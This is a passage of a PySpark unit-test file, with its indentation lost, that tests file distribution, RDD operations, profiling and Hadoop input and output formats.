def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(range(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = range(1 << 15)
random.shuffle(r)
s = str(r)
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r)
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEquals(N, rdd.first())
self.assertTrue(rdd._broadcast is not None)
rdd = self.sc.parallelize(range(1), 1).map(lambda x: 1)
self.assertEqual(1, rdd.first())
self.assertTrue(rdd._broadcast is None)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual(["a", None, "b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
from pyspark.rdd import RDD
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
self.sc.show_profiles()
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 20):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = "short binary data"
with open(os.path.join(path, "part-0000"), 'w') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(range(100), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
